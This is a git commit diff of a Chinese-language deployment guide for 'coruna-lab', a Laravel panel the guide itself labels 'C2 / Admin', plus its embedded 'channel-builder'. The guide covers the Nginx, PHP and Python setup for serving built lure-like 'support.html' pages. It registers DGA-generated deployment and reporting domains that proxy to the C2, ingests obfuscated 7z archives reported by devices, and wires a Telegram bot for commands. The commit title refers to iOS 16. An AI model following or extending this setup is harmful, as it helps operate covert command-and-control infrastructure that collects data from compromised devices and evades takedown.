fix: ios 16

This commit is contained in:
hashbro
2026-08-09 21:57:08 +08:00
parent 6bf33e2761
commit 6bc172c570
179 changed files with 6246 additions and 400 deletions
+56 -119
View File
@@ -1,38 +1,33 @@
# 宝塔部署指南(coruna-lab + coruna-lab-web)
# 宝塔部署指南(coruna-lab + channel-builder)
同机部署、职责分离。构建 API 仅本机访问;Admin / C2 与静态产物站对外。
兄弟项目构建细节另见 `[../../coruna-lab-web/docs/BUILD_API.md](../../coruna-lab-web/docs/BUILD_API.md)`。
同机部署:Laravel 内嵌 `channel-builder` 直接构建产物;Admin / C2 与静态产物站对外。**不再需要**独立 Build API / 8081。
## 架构
| 角色 | 项目 / 路径 | 对外 | 进程 |
| ---------- | -------------------------- | ---------------------------- | ----------------- |
| C2 / Admin | `coruna-lab` | `https://admin.example.com` | Nginx + PHP-FPM |
| 静态产物站 | `coruna-lab-web/artifacts` | `https://static.example.com` | Nginx 只读静态 |
| Build API | `coruna-lab-web` | **仅本机** `127.0.0.1:8081` | Supervisor / 进程守护 |
| 角色 | 项目 / 路径 | 对外 | 进程 |
| ---------- | ------------------------------- | --------------------------- | --------------- |
| C2 / Admin / 静态 | `coruna-lab`(`public/`) | `https://admin.example.com` | Nginx + PHP-FPM |
| 构建工具 | `coruna-lab/channel-builder` | 无(PHP Process 调用) | Python venv |
```text
设备 / 运营
│
├─ Admin / C2 API ──► coruna-lab (Laravel)
├─ Admin / C2 /web /sync ──► coruna-lab/public (Laravel)
│ │
│ └─ HTTP Bearer ──► 127.0.0.1:8081 (build_api)
│ │
│ ▼
└─ /channel/<id>/web|sync ──► static 站点 ──► artifacts/
│ └─ Process ──► channel-builder → public/web|sync
│ └─ state → storage/app/channel-builder
└─ DGA 域名反代到同一 public/
```
建议目录:
```text
/www/wwwroot/coruna-lab/
/www/wwwroot/coruna-lab-web/
```
防火墙只放行 80/443;**不要**把 `8081` 暴露到公网。
防火墙只放行 80/443。
---
@@ -78,7 +73,7 @@ max_input_time = 600
```
- `post_max_size` ≥ `upload_max_filesize`
- Admin 触发构建会同步等待 lab-web,超时与 `.env` 中 `CORUNA_BUILD_SERVICE_TIMEOUT` 对齐(建议 ≥ 600)
- Admin 触发构建会同步等待 Python 脚本,超时与 `.env` 中 `CORUNA_CHANNEL_BUILDER_TIMEOUT` 对齐(建议 ≥ 600)
- CLI 查 `max_execution_time` 常为 `0`(不限制),属正常;以浏览器/`phpinfo()` 的 FPM 值为准
Nginx 站点配置建议同时加大:
@@ -93,110 +88,51 @@ client_max_body_size 64m;
## 1. 部署 coruna-lab-web(先部署)
## 1. 部署 channel-builder(随 coruna-lab)
### 1.1 代码与依赖
```bash
cd /www/wwwroot/coruna-lab-web
cd /www/wwwroot/coruna-lab/channel-builder
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
pip install -r frontend/tools/requirements.txt
mkdir -p artifacts
chown -R www:www artifacts # 按面板运行用户调整
# PHP-FPM 用户需能执行 .venv/bin/python,并写 public/ 与 storage/app/channel-builder/
chown -R www:www /www/wwwroot/coruna-lab/public /www/wwwroot/coruna-lab/storage
```
### 1.2 `.env`
### 1.2 静态路径(写在 Admin 站点 public/)
```bash
cp .env.example .env
python3 -c 'import secrets; print(secrets.token_urlsafe(48))' # 生成 token
产物默认落在 **Laravel `public/`**,与 Admin 同站即可,无需单独静态站点:
```text
https://admin.example.com/web/<id>/support.html
https://admin.example.com/sync/daily.html
```
示例:
```dotenv
BUILD_API_TOKEN=用长随机串替换
BUILD_API_ARTIFACT_ROOT=/www/wwwroot/coruna-lab-web/artifacts
BUILD_API_PROJECT_SCRIPT=/www/wwwroot/coruna-lab-web/frontend/tools/new_project.py
BUILD_API_PYTHON=/www/wwwroot/coruna-lab-web/.venv/bin/python
BUILD_API_HOST=127.0.0.1
BUILD_API_PORT=8081
BUILD_API_TIMEOUT=900
```
### 1.3 进程守护
宝塔 → Supervisor / 进程守护管理器:
| 项 | 值 |
| ---- | ----------------------------------------------------------- |
| 名称 | `coruna-build-api` |
| 启动用户 | `www` |
| 运行目录 | `/www/wwwroot/coruna-lab-web` |
| 启动命令 | `/www/wwwroot/coruna-lab-web/.venv/bin/python -m build_api` |
验证:
```bash
curl -s http://127.0.0.1:8081/health
```
### 1.4 静态站(只暴露 web / sync)
新建站点(如 `static.example.com`):
- 根目录:`/www/wwwroot/coruna-lab-web/artifacts`
- 关闭 PHP
- SSL 按需开启
配置示例(正则含 `{32}` 时**必须加引号**,否则 Nginx 会把 `{` 当配置块):
在 Admin 站点 Nginx 中优先静态命中(放在 `location /` 的 `try_files … /index.php` **之前**):
```nginx
server {
listen 80;
listen 443 ssl http2;
server_name static.example.com;
root /www/wwwroot/coruna-lab-web/artifacts;
location ~ "^/web/[0-9a-f]{32}/" {
try_files $uri =404;
add_header Cache-Control "public, max-age=300";
}
location ~ "^/channel/[0-9a-f]{32}/(web|sync)/" {
try_files $uri =404;
add_header Cache-Control "public, max-age=300";
}
location / {
return 404;
}
location /sync/ {
try_files $uri =404;
add_header Cache-Control "public, max-age=60";
}
```
改完:
`lab_seeds.json` / `out/` 在 `storage/app/channel-builder/`,不在 web 根。
```bash
nginx -t && nginx -s reload
```
公开 URL:
```text
https://static.example.com/channel/<id>/web/support.html
https://static.example.com/channel/<id>/sync/daily.html
```
`staging/`、`locks/`、`manifest.json`、`out/` 等不得对外。
**首次创建渠道后**,用返回的 DGA `domains.deployment` / `domains.reporting` 注册域名,反代到同一 `public/`(reporting → C2)。
---
@@ -281,17 +217,18 @@ SESSION_DOMAIN=null
SESSION_SECURE_COOKIE=true
SESSION_SAME_SITE=lax
# 同机 Build API(token 与 lab-web BUILD_API_TOKEN 一致)
CORUNA_BUILD_SERVICE_URL=http://127.0.0.1:8081
CORUNA_BUILD_SERVICE_TOKEN=与 BUILD_API_TOKEN 相同
CORUNA_BUILD_SERVICE_CONNECT_TIMEOUT=5
CORUNA_BUILD_SERVICE_TIMEOUT=600
# 内嵌 channel-builder(无 Build API;产物默认 public/)
CORUNA_CHANNEL_BUILDER_PYTHON=/www/wwwroot/coruna-lab/channel-builder/.venv/bin/python
# CORUNA_ARTIFACT_ROOT=/www/wwwroot/coruna-lab/public
# CORUNA_CHANNEL_STATE_ROOT=/www/wwwroot/coruna-lab/storage/app/channel-builder
CORUNA_CHANNEL_BUILDER_TIMEOUT=600
CORUNA_STATIC_SITE_BASE_URL=https://static.example.com
CORUNA_STATIC_SITE_BASE_URL=https://admin.example.com
CORUNA_STATIC_SITE_SCHEME=https
CORUNA_LAB_CHANNEL_DOMAINS=www.dep1.example,www.dep2.example
CORUNA_REPORTING_DOMAINS=www.rep1.example,www.rep2.example
# 可选:后台链接展示用(不驱动二进制补丁;DGA 域名以首次构建返回为准)
CORUNA_LAB_CHANNEL_DOMAINS=
CORUNA_REPORTING_DOMAINS=
# C2 上报 7z 解包(与 build_api 无关,仍需配置)
CORUNA_7Z_BIN=/www/wwwroot/coruna-lab/bin/7z
@@ -321,7 +258,7 @@ chmod -R ug+rwx storage/framework/sessions
### 2.5 p7zip(C2 入库)
`CORUNA_7Z_BIN` **仍需要**:设备 multipart 上报的混淆 7z 由 Laravel `CorunaArchive` 解压,与渠道构建拆到 lab-web 无关。
`CORUNA_7Z_BIN` **仍需要**:设备 multipart 上报的混淆 7z 由 Laravel `CorunaArchive` 解压,与 channel-builder 无关。
Debian / Ubuntu(宝塔常见):
@@ -413,11 +350,11 @@ tail -n 80 /www/server/php/82/var/log/php-fpm.log
## 3. 联调检查清单
1. `curl -s http://127.0.0.1:8081/health` 正常
1. `channel-builder/.venv/bin/python -c 'import Crypto, py7zr; print("ok")'` 正常
2. Admin 登录 `https://admin.example.com/admin/login`
3. 后台新建渠道 → 构建成功(lab-web 进程日志无报错)
4. 打开静态站 support / daily 页
5. `manifest.json`、`/staging/` 等返回 404
3. 后台新建渠道 → 构建成功;响应含 `seeds` / `domains`(首次)
4. 打开静态站 `/web/<id>/support.html` 与 `/sync/daily.html`
5. `/web/<id>/support.html` 与 `/sync/daily.html` 可直接访问;seed 在 storage 不暴露
6. C2 上报与 7z 入库正常
7. `telegram:set-webhook` 成功;Bot 能收到指令
@@ -430,10 +367,10 @@ tail -n 80 /www/server/php/82/var/log/php-fpm.log
| 动作 | 命令 / 操作 |
| ---------- | --------------------------------------------------------------- |
| 更新 lab-web | 拉代码 → `pip install -r ...` → 重启 Supervisor 进程 |
| 更新 lab | 拉代码 → `composer install` → `artisan migrate` → `config:cache` 等 |
| 备份 | MySQL + `artifacts/` |
| 构建超时 | 同时加大 `BUILD_API_TIMEOUT` 与 `CORUNA_BUILD_SERVICE_TIMEOUT` |
| 更新 builder | 拉代码 → `channel-builder/.venv` 内 `pip install -r requirements.txt` |
| 更新 lab | 拉代码 → `composer install` → `artisan migrate` → `config:cache` 等 |
| 备份 | MySQL + `public/web` + `public/sync` + `storage/app/channel-builder` |
| 构建超时 | 加大 `CORUNA_CHANNEL_BUILDER_TIMEOUT` 与 PHP `max_execution_time` |
当前 `QUEUE_CONNECTION=sync`,一般无需单独 queue worker。
@@ -483,7 +420,7 @@ PHP「禁用函数」含 `putenv`。在 PHP 8.2 设置里移除后重试。
location 正则未加引号,`{32}` 被当成配置块。改为:
```nginx
location ~ "^/channel/[0-9a-f]{32}/(web|sync)/" {
location ~ "^/web/[0-9a-f]{32}/" {
```
@@ -541,10 +478,10 @@ chmod -R ug+rwx storage/framework/sessions
## 6. 分机部署(可选)
lab 与 lab-web 不同机时:
若要把 `/web` `/sync` 拆到另一台纯静态机:
- lab-web 内网 Nginx 反代 `127.0.0.1:8081`,仅放行 lab 机器 IP
- Laravel:`CORUNA_BUILD_SERVICE_URL=https://builds.internal.example`
- 静态站仍指向 lab-web 的 `artifacts`
- 构建后 rsync `public/web` + `public/sync` 到静态机文档根
- 或把 `CORUNA_ARTIFACT_ROOT` 指到共享盘,静态机 Nginx root 指向该盘
- seed 状态仍放在 lab 的 `CORUNA_CHANNEL_STATE_ROOT`
同机部署时不必单独建公网 builds 站点。
同机时无需拆分,Admin `public/` 即静态根。